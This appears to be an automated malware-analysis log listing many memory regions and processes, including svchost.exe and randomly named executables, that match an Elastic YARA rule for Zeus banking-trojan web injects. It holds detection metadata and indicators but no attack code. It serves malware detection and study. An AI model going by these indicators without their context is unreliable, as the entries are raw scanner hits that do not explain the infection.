Source: 00000002.00000003.2643045244.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000A.00000002.2575020460.00000000014C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000024.00000002.2645314223.00000000023A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2642865814.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2562478885.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2684438036.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000024.00000002.2645122457.0000000002200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2712266421.000000000EE00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2671268394.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2684242011.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2650052400.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2689405360.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2643706755.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2682432522.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2522638686.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2136596251.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2695314934.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2666567712.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2711233354.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2649020462.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2670333858.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2638992211.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2682624187.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000E.00000002.2560722712.0000000002AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2683674807.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001C.00000002.2632514116.0000000002EB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: Bpfz752pYZ.exe PID: 1596, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: svchost.exe PID: 4888, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 1656, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 3000, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 616, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 3704, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 4828, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 5576, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 4180, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 5376, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 4836, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 936, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 5720, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
